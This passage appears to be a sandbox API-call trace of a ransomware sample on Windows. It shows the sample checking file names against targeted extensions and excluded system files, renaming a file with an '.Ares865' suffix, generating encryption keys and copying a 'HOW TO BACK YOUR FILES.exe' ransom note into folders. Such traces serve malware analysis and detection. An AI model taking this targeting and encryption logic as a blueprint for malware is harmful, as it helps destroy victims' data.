[0089.527] lstrlenW (lpString="kexis") returned 5 [0089.527] lstrcmpiW (lpString1="k.png", lpString2="kexis") returned -1 [0089.527] lstrlenW (lpString="lgc") returned 3 [0089.527] lstrcmpiW (lpString1="png", lpString2="lgc") returned 1 [0089.527] lstrlenW (lpString="lwx") returned 3 [0089.527] lstrcmpiW (lpString1="png", lpString2="lwx") returned 1 [0089.527] lstrlenW (lpString="maf") returned 3 [0089.527] lstrcmpiW (lpString1="png", lpString2="maf") returned 1 [0089.527] lstrlenW (lpString="maq") returned 3 [0089.527] lstrcmpiW (lpString1="png", lpString2="maq") returned 1 [0089.527] lstrlenW (lpString="mar") returned 3 [0089.527] lstrcmpiW (lpString1="png", lpString2="mar") returned 1 [0089.527] lstrlenW (lpString="marshal") returned 7 [0089.527] lstrcmpiW (lpString1="ark.png", lpString2="marshal") returned -1 [0089.527] lstrlenW (lpString="mas") returned 3 [0089.527] lstrcmpiW (lpString1="png", lpString2="mas") returned 1 [0089.527] lstrlenW (lpString="mav") returned 3 [0089.527] lstrcmpiW (lpString1="png", lpString2="mav") returned 1 [0089.527] lstrlenW (lpString="maw") returned 3 [0089.527] lstrcmpiW (lpString1="png", lpString2="maw") returned 1 [0089.527] lstrlenW (lpString="mdbhtml") returned 7 [0089.527] lstrcmpiW (lpString1="ark.png", lpString2="mdbhtml") returned -1 [0089.527] lstrlenW (lpString="mdn") returned 3 [0089.527] lstrcmpiW (lpString1="png", lpString2="mdn") returned 1 [0089.527] lstrlenW (lpString="mdt") returned 3 [0089.527] lstrcmpiW (lpString1="png", lpString2="mdt") returned 1 [0089.527] lstrlenW (lpString="mfd") returned 3 [0089.527] lstrcmpiW (lpString1="png", lpString2="mfd") returned 1 [0089.528] lstrlenW (lpString="mpd") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="mpd") returned 1 [0089.528] lstrlenW (lpString="mrg") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="mrg") returned 1 [0089.528] lstrlenW (lpString="mud") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="mud") returned 1 [0089.528] lstrlenW (lpString="mwb") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="mwb") returned 1 [0089.528] lstrlenW (lpString="myd") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="myd") returned 1 [0089.528] lstrlenW (lpString="ndf") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="ndf") returned 1 [0089.528] lstrlenW (lpString="nnt") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="nnt") returned 1 [0089.528] lstrlenW (lpString="nrmlib") returned 6 [0089.528] lstrcmpiW (lpString1="rk.png", lpString2="nrmlib") returned 1 [0089.528] lstrlenW (lpString="ns2") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="ns2") returned 1 [0089.528] lstrlenW (lpString="ns3") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="ns3") returned 1 [0089.528] lstrlenW (lpString="ns4") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="ns4") returned 1 [0089.528] lstrlenW (lpString="nsf") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="nsf") returned 1 [0089.528] lstrlenW (lpString="nv") returned 2 [0089.528] lstrcmpiW (lpString1="ng", lpString2="nv") returned -1 [0089.528] lstrlenW (lpString="nv2") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="nv2") returned 1 [0089.528] lstrlenW (lpString="nwdb") returned 4 [0089.528] lstrcmpiW (lpString1=".png", lpString2="nwdb") returned -1 [0089.528] lstrlenW (lpString="nyf") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="nyf") returned 1 [0089.528] lstrlenW (lpString="odb") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0089.528] lstrlenW (lpString="odb") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0089.528] lstrlenW (lpString="oqy") returned 3 [0089.528] lstrcmpiW (lpString1="png", lpString2="oqy") returned 1 [0089.528] lstrlenW (lpString="ora") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="ora") returned 1 [0089.529] lstrlenW (lpString="orx") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="orx") returned 1 [0089.529] lstrlenW (lpString="owc") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="owc") returned 1 [0089.529] lstrlenW (lpString="p96") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="p96") returned 1 [0089.529] lstrlenW (lpString="p97") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="p97") returned 1 [0089.529] lstrlenW (lpString="pan") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="pan") returned 1 [0089.529] lstrlenW (lpString="pdb") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="pdb") returned 1 [0089.529] lstrlenW (lpString="pdm") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="pdm") returned 1 [0089.529] lstrlenW (lpString="pnz") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="pnz") returned -1 [0089.529] lstrlenW (lpString="qry") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="qry") returned -1 [0089.529] lstrlenW (lpString="qvd") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="qvd") returned -1 [0089.529] lstrlenW (lpString="rbf") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="rbf") returned -1 [0089.529] lstrlenW (lpString="rctd") returned 4 [0089.529] lstrcmpiW (lpString1=".png", lpString2="rctd") returned -1 [0089.529] lstrlenW (lpString="rod") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="rod") returned -1 [0089.529] lstrlenW (lpString="rodx") returned 4 [0089.529] lstrcmpiW (lpString1=".png", lpString2="rodx") returned -1 [0089.529] lstrlenW (lpString="rpd") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="rpd") returned -1 [0089.529] lstrlenW (lpString="rsd") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="rsd") returned -1 [0089.529] lstrlenW (lpString="sas7bdat") returned 8 [0089.529] lstrcmpiW (lpString1="mark.png", lpString2="sas7bdat") returned -1 [0089.529] lstrlenW (lpString="sbf") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="sbf") returned -1 [0089.529] lstrlenW (lpString="scx") returned 3 [0089.529] lstrcmpiW (lpString1="png", lpString2="scx") returned -1 [0089.529] lstrlenW (lpString="sdb") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="sdb") returned -1 [0089.530] lstrlenW (lpString="sdc") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="sdc") returned -1 [0089.530] lstrlenW (lpString="sdf") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="sdf") returned -1 [0089.530] lstrlenW (lpString="sis") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="sis") returned -1 [0089.530] lstrlenW (lpString="spq") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="spq") returned -1 [0089.530] lstrlenW (lpString="te") returned 2 [0089.530] lstrcmpiW (lpString1="ng", lpString2="te") returned -1 [0089.530] lstrlenW (lpString="teacher") returned 7 [0089.530] lstrcmpiW (lpString1="ark.png", lpString2="teacher") returned -1 [0089.530] lstrlenW (lpString="tmd") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="tmd") returned -1 [0089.530] lstrlenW (lpString="tps") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="tps") returned -1 [0089.530] lstrlenW (lpString="trc") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0089.530] lstrlenW (lpString="trc") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0089.530] lstrlenW (lpString="trm") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="trm") returned -1 [0089.530] lstrlenW (lpString="udb") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="udb") returned -1 [0089.530] lstrlenW (lpString="udl") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="udl") returned -1 [0089.530] lstrlenW (lpString="usr") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="usr") returned -1 [0089.530] lstrlenW (lpString="v12") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="v12") returned -1 [0089.530] lstrlenW (lpString="vis") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="vis") returned -1 [0089.530] lstrlenW (lpString="vpd") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="vpd") returned -1 [0089.530] lstrlenW (lpString="vvv") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="vvv") returned -1 [0089.530] lstrlenW (lpString="wdb") returned 3 [0089.530] lstrcmpiW (lpString1="png", lpString2="wdb") returned -1 [0089.531] lstrlenW (lpString="wmdb") returned 4 [0089.531] lstrcmpiW (lpString1=".png", lpString2="wmdb") returned -1 [0089.531] lstrlenW (lpString="wrk") returned 3 [0089.531] lstrcmpiW (lpString1="png", lpString2="wrk") returned -1 [0089.531] lstrlenW (lpString="xdb") returned 3 [0089.531] lstrcmpiW (lpString1="png", lpString2="xdb") returned -1 [0089.531] lstrlenW (lpString="xld") returned 3 [0089.531] lstrcmpiW (lpString1="png", lpString2="xld") returned -1 [0089.531] lstrlenW (lpString="xmlff") returned 5 [0089.531] lstrcmpiW (lpString1="k.png", lpString2="xmlff") returned -1 [0089.531] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.Ares865") returned 109 [0089.531] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.ares865"), dwFlags=0x1) returned 1 [0089.534] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.534] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28865) returned 1 [0089.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.535] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.535] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.535] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.535] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x73d0, lpName=0x0) returned 0x15c [0089.537] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x73d0) returned 0x190000 [0089.540] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.540] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.540] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.540] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.540] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.541] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.541] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.541] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.541] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.541] CloseHandle (hObject=0x15c) returned 1 [0089.541] CloseHandle (hObject=0x118) returned 1 [0089.541] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.541] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.541] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.542] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3011a9e, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd3011a9e, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="watermark.png", cAlternateFileName="")) returned 0 [0089.542] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.542] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b10 [0089.542] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0089.542] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0089.542] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0089.542] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 87 [0089.542] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0089.542] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.542] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.542] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.543] GetLastError () returned 0x0 [0089.543] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.543] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.543] CloseHandle (hObject=0x120) returned 1 [0089.543] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.543] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.543] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c84ada0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c84ada0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.543] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.543] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.543] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.543] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c84ada0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c84ada0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.543] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.543] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.543] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.543] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.543] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f07a66f, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f07a66f, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76b3ce5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1 [0089.543] lstrcmpiW (lpString1="background.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.543] lstrcmpiW (lpString1="background.png", lpString2="aoldtz.exe") returned 1 [0089.543] lstrcmpiW (lpString1="background.png", lpString2=".") returned 1 [0089.543] lstrcmpiW (lpString1="background.png", lpString2="..") returned 1 [0089.544] lstrcmpiW (lpString1="background.png", lpString2="windows") returned -1 [0089.544] lstrcmpiW (lpString1="background.png", lpString2="bootmgr") returned -1 [0089.544] lstrcmpiW (lpString1="background.png", lpString2="temp") returned -1 [0089.544] lstrcmpiW (lpString1="background.png", lpString2="pagefile.sys") returned -1 [0089.544] lstrcmpiW (lpString1="background.png", lpString2="boot") returned -1 [0089.544] lstrcmpiW (lpString1="background.png", lpString2="ids.txt") returned -1 [0089.544] lstrcmpiW (lpString1="background.png", lpString2="ntuser.dat") returned -1 [0089.544] lstrcmpiW (lpString1="background.png", lpString2="perflogs") returned -1 [0089.544] lstrcmpiW (lpString1="background.png", lpString2="MSBuild") returned -1 [0089.544] lstrlenW (lpString="background.png") returned 14 [0089.544] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*") returned 89 [0089.544] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="background.png" | out: lpString1="background.png") returned="background.png" [0089.544] lstrlenW (lpString="background.png") returned 14 [0089.544] lstrlenW (lpString="Ares865") returned 7 [0089.544] lstrcmpiW (lpString1="und.png", lpString2="Ares865") returned 1 [0089.544] lstrlenW (lpString=".dll") returned 4 [0089.544] lstrcmpiW (lpString1="background.png", lpString2=".dll") returned 1 [0089.544] lstrlenW (lpString=".lnk") returned 4 [0089.544] lstrcmpiW (lpString1="background.png", lpString2=".lnk") returned 1 [0089.544] lstrlenW (lpString=".ini") returned 4 [0089.544] lstrcmpiW (lpString1="background.png", lpString2=".ini") returned 1 [0089.544] lstrlenW (lpString=".sys") returned 4 [0089.544] lstrcmpiW (lpString1="background.png", lpString2=".sys") returned 1 [0089.544] lstrlenW (lpString="background.png") returned 14 [0089.544] lstrlenW (lpString="bak") returned 3 [0089.544] lstrcmpiW (lpString1="png", lpString2="bak") returned 1 [0089.544] lstrlenW (lpString="ba_") returned 3 [0089.544] lstrcmpiW (lpString1="png", lpString2="ba_") returned 1 [0089.544] lstrlenW (lpString="dbb") returned 3 [0089.544] lstrcmpiW (lpString1="png", lpString2="dbb") returned 1 [0089.544] lstrlenW (lpString="vmdk") returned 4 [0089.544] lstrcmpiW (lpString1=".png", lpString2="vmdk") returned -1 [0089.544] lstrlenW (lpString="rar") returned 3 [0089.544] lstrcmpiW (lpString1="png", lpString2="rar") returned -1 [0089.544] lstrlenW (lpString="zip") returned 3 [0089.544] lstrcmpiW (lpString1="png", lpString2="zip") returned -1 [0089.544] lstrlenW (lpString="tgz") returned 3 [0089.544] lstrcmpiW (lpString1="png", lpString2="tgz") returned -1 [0089.544] lstrlenW (lpString="vbox") returned 4 [0089.544] lstrcmpiW (lpString1=".png", lpString2="vbox") returned -1 [0089.545] lstrlenW (lpString="vdi") returned 3 [0089.545] lstrcmpiW (lpString1="png", lpString2="vdi") returned -1 [0089.545] lstrlenW (lpString="vhd") returned 3 [0089.545] lstrcmpiW (lpString1="png", lpString2="vhd") returned -1 [0089.545] lstrlenW (lpString="vhdx") returned 4 [0089.545] lstrcmpiW (lpString1=".png", lpString2="vhdx") returned -1 [0089.545] lstrlenW (lpString="avhd") returned 4 [0089.545] lstrcmpiW (lpString1=".png", lpString2="avhd") returned -1 [0089.545] lstrlenW (lpString="db") returned 2 [0089.545] lstrcmpiW (lpString1="ng", lpString2="db") returned 1 [0089.545] lstrlenW (lpString="db2") returned 3 [0089.545] lstrcmpiW (lpString1="png", lpString2="db2") returned 1 [0089.545] lstrlenW (lpString="db3") returned 3 [0089.545] lstrcmpiW (lpString1="png", lpString2="db3") returned 1 [0089.545] lstrlenW (lpString="dbf") returned 3 [0089.545] lstrcmpiW (lpString1="png", lpString2="dbf") returned 1 [0089.545] lstrlenW (lpString="mdf") returned 3 [0089.545] lstrcmpiW (lpString1="png", lpString2="mdf") returned 1 [0089.545] lstrlenW (lpString="mdb") returned 3 [0089.545] lstrcmpiW (lpString1="png", lpString2="mdb") returned 1 [0089.545] lstrlenW (lpString="sql") returned 3 [0089.545] lstrcmpiW (lpString1="png", lpString2="sql") returned -1 [0089.545] lstrlenW (lpString="sqlite") returned 6 [0089.545] lstrcmpiW (lpString1="nd.png", lpString2="sqlite") returned -1 [0089.545] lstrlenW (lpString="sqlite3") returned 7 [0089.545] lstrcmpiW (lpString1="und.png", lpString2="sqlite3") returned 1 [0089.545] lstrlenW (lpString="sqlitedb") returned 8 [0089.545] lstrcmpiW (lpString1="ound.png", lpString2="sqlitedb") returned -1 [0089.545] lstrlenW (lpString="xml") returned 3 [0089.545] lstrcmpiW (lpString1="png", lpString2="xml") returned -1 [0089.545] lstrlenW (lpString="$er") returned 3 [0089.545] lstrcmpiW (lpString1="png", lpString2="$er") returned 1 [0089.545] lstrlenW (lpString="4dd") returned 3 [0089.545] lstrcmpiW (lpString1="png", lpString2="4dd") returned 1 [0089.545] lstrlenW (lpString="4dl") returned 3 [0089.545] lstrcmpiW (lpString1="png", lpString2="4dl") returned 1 [0089.545] lstrlenW (lpString="^^^") returned 3 [0089.545] lstrcmpiW (lpString1="png", lpString2="^^^") returned 1 [0089.545] lstrlenW (lpString="abs") returned 3 [0089.545] lstrcmpiW (lpString1="png", lpString2="abs") returned 1 [0089.546] lstrlenW (lpString="abx") returned 3 [0089.546] lstrcmpiW (lpString1="png", lpString2="abx") returned 1 [0089.546] lstrlenW (lpString="accdb") returned 5 [0089.546] lstrcmpiW (lpString1="d.png", lpString2="accdb") returned 1 [0089.546] lstrlenW (lpString="accdc") returned 5 [0089.546] lstrcmpiW (lpString1="d.png", lpString2="accdc") returned 1 [0089.546] lstrlenW (lpString="accde") returned 5 [0089.546] lstrcmpiW (lpString1="d.png", lpString2="accde") returned 1 [0089.546] lstrlenW (lpString="accdr") returned 5 [0089.546] lstrcmpiW (lpString1="d.png", lpString2="accdr") returned 1 [0089.546] lstrlenW (lpString="accdt") returned 5 [0089.546] lstrcmpiW (lpString1="d.png", lpString2="accdt") returned 1 [0089.546] lstrlenW (lpString="accdw") returned 5 [0089.546] lstrcmpiW (lpString1="d.png", lpString2="accdw") returned 1 [0089.546] lstrlenW (lpString="accft") returned 5 [0089.546] lstrcmpiW (lpString1="d.png", lpString2="accft") returned 1 [0089.546] lstrlenW (lpString="adb") returned 3 [0089.546] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0089.546] lstrlenW (lpString="adb") returned 3 [0089.546] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0089.546] lstrlenW (lpString="ade") returned 3 [0089.546] lstrcmpiW (lpString1="png", lpString2="ade") returned 1 [0089.546] lstrlenW (lpString="adf") returned 3 [0089.546] lstrcmpiW (lpString1="png", lpString2="adf") returned 1 [0089.546] lstrlenW (lpString="adn") returned 3 [0089.546] lstrcmpiW (lpString1="png", lpString2="adn") returned 1 [0089.546] lstrlenW (lpString="adp") returned 3 [0089.546] lstrcmpiW (lpString1="png", lpString2="adp") returned 1 [0089.546] lstrlenW (lpString="alf") returned 3 [0089.546] lstrcmpiW (lpString1="png", lpString2="alf") returned 1 [0089.546] lstrlenW (lpString="ask") returned 3 [0089.546] lstrcmpiW (lpString1="png", lpString2="ask") returned 1 [0089.546] lstrlenW (lpString="btr") returned 3 [0089.546] lstrcmpiW (lpString1="png", lpString2="btr") returned 1 [0089.546] lstrlenW (lpString="cat") returned 3 [0089.546] lstrcmpiW (lpString1="png", lpString2="cat") returned 1 [0089.546] lstrlenW (lpString="cdb") returned 3 [0089.546] lstrcmpiW (lpString1="png", lpString2="cdb") returned 1 [0089.547] lstrlenW (lpString="ckp") returned 3 [0089.547] lstrcmpiW (lpString1="png", lpString2="ckp") returned 1 [0089.547] lstrlenW (lpString="cma") returned 3 [0089.547] lstrcmpiW (lpString1="png", lpString2="cma") returned 1 [0089.547] lstrlenW (lpString="cpd") returned 3 [0089.547] lstrcmpiW (lpString1="png", lpString2="cpd") returned 1 [0089.547] lstrlenW (lpString="dacpac") returned 6 [0089.547] lstrcmpiW (lpString1="nd.png", lpString2="dacpac") returned 1 [0089.547] lstrlenW (lpString="dad") returned 3 [0089.547] lstrcmpiW (lpString1="png", lpString2="dad") returned 1 [0089.547] lstrlenW (lpString="dadiagrams") returned 10 [0089.547] lstrcmpiW (lpString1="ground.png", lpString2="dadiagrams") returned 1 [0089.547] lstrlenW (lpString="daschema") returned 8 [0089.547] lstrcmpiW 